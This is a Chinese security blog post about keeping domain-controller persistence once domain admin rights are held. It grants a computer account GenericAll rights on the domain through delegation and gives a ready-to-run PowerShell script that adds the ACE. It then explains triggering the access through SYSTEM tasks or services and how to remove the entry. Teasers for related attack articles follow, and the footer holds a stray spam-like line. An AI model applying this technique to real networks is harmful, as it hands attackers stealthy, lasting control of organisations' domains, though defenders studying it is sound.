<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    通過ACL維持域控權限

    VSole2021-10-21 09:14:15

    前置要求

    1. 已獲得域管理權限
    2. 有一臺域下的計算機SYSTEM權限

    相較于其他維權方式的優點:

    常見的方法都是圍繞著用戶、密碼、票據來實現權限維持。

    此方法不需要添加域賬號,也就不用為密碼過期、賬號禁用、票據操作而頭疼。

    操作步驟

    界面上操作

    1. 右鍵域->委派控制


    1. 添加->高級->對象類型->勾選計算機 找到有權限的計算機


    1. 創建自定義任務


    1. 默認值,下一步


    1. 選擇完全控制

    使用powershell修改

    powershell

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    Import-Module ActiveDirectory
    $ad = [ADSI]("LDAP://DC=zpyjjd,DC=com")
    $computer = Get-ADComputer -Identity "WIN-N39A9OGCR8N"
    $Identity = New-Object 'Security.Principal.SecurityIdentifier' $computer.SID.Value
    $rights = [System.DirectoryServices.ActiveDirectoryRights]::GenericAll
    $type = [System.Security.AccessControl.AccessControlType]::Allow
    $inherit = [System.DirectoryServices.ActiveDirectorySecurityInheritance]::All
    $ace = New-Object System.DirectoryServices.ActiveDirectoryAccessRule $Identity,$rights,$type,$inherit
    $ad.ObjectSecurity.AddAccessRule($ace)
    $ad.CommitChanges()
    


    此時該計算機就具備整個域控的權限。

    如何觸發

    1. 可以通過計劃任務,創建一個SYSTEM權限運行計劃
    2. 也可以通過創建SYSTEM運行的服務來觸發

    如何刪除

    1. 選擇高級功能
    2. 右鍵域,選擇屬性。再選擇安全,最后選擇之前添加的計算機,點擊刪除

    電腦system
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    電腦被挖礦分析
    2021-10-12 15:39:27
    由于區塊鏈技術熱炒以及數字貨幣魔性推廣運營,如比特幣、以太幣、門羅幣、達世幣等層出不窮的數字貨幣被各種熱炒,在這些的利益驅使下,便出現各種模式的挖礦木馬程序。挖礦木馬主要就是通過利用各種手段,將挖礦程序植入到用戶的計算機中,在用戶未感知到的情況下,偷偷利用用戶的計算機進行執行挖礦功能,從而獲取收益。
    近期有使用手機投屏的需求,用過幾個小工具感覺效果不是很理想,所以想著著手分析下。
    最近不知道怎么回事,家里電腦經常性地出現藍屏,很多時候有些文檔沒有保存便藍屏導致文檔丟失,其中也包括您現在正在看到的這一篇文章,以前一直比較懶,重啟大法一頓懟,然后重新再做編輯,只不過PPT重做簡直要人命,無奈之下,放下了所有的工作。
    某些安全措施嚴格的目標,還會啟用Bitlocker磁盤加密。配置與使用完整版本的Kon-Boot是付費軟件,個人許可證價格為$50,商業許可證價格為$140。該版本可以繞過除Windows 10的在線賬戶之外的密碼。右鍵,以管理員身份運行bat。但在目前,GrabAccess僅支持UEFI引導的64位系統。針對Windows xp,或MBR引導的Windows 7,仍推薦Kon-Boot。在不登陸的情況下,也可以執行系統命令或讀寫文件。至此GrabAccess的最簡安裝完成。在啟動時進入BIOS菜單。選擇從U盤啟動,或設置U盤為第一啟動項。
    惠普 OMEN 筆記本電腦和臺式游戲計算機中的一個高度嚴重漏洞(被跟蹤為CVE-2021-3437)使數百萬系統面臨 DoS 和特權升級攻擊。
    WEB安全梳理-操作系統
    2022-08-10 07:16:03
    WEB安全梳理-操作系統
    網安引領時代,彌天點亮未來 0x00序言在日常工作中,如果辦公電腦或者個人PC有以下兩個方面的異常行為
    0x00 前言在2021年12月的某星期天的下午,成都飄著小雨,冷的瑟瑟發抖,在家里打開電腦開始學習,但是無意間發現之前滲透的非法網站又開起來了,但是只是一個寶塔頁面,沒有任何價值,于是在同ip下發現一個博彩網站,隨之展開滲透0x01?弱口令啊,YYDS!!
    從uart 進入uboot shell某路由器設備拆開后定位到uart接口,將uart引腳通過TTL接入到電腦,路由器上電啟動,觀察啟動日志。從上面設備的部分啟動日志可以看出,uboot shell可以被中斷,路由器上電后快速按任意鍵可進入。為了方便后續逆向工作,最好能進入路由器系統,但目前是console已關閉,且未發現telnet、ssh等服務,只能從uboot shell為切入點進一步分析。
    在互聯網尚未普及的時代,機構唯一需要擔心的就是內網中員工使用的辦公電腦。而現在,遠不只是在寫字樓,員工會在機場、咖啡店、酒店辦公,由于疫情時代,居家辦公更是常態。 與在公司內網上對終端進行保護相比,居家辦公的終端面臨的威脅完全不一樣。惡意軟件泛濫的游戲設備、連接互聯網的電視、音箱、攝像頭……這些智能設備的軟件可能上一次更新是在幾年前,都與你的辦公電腦處在同一個局域網。
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类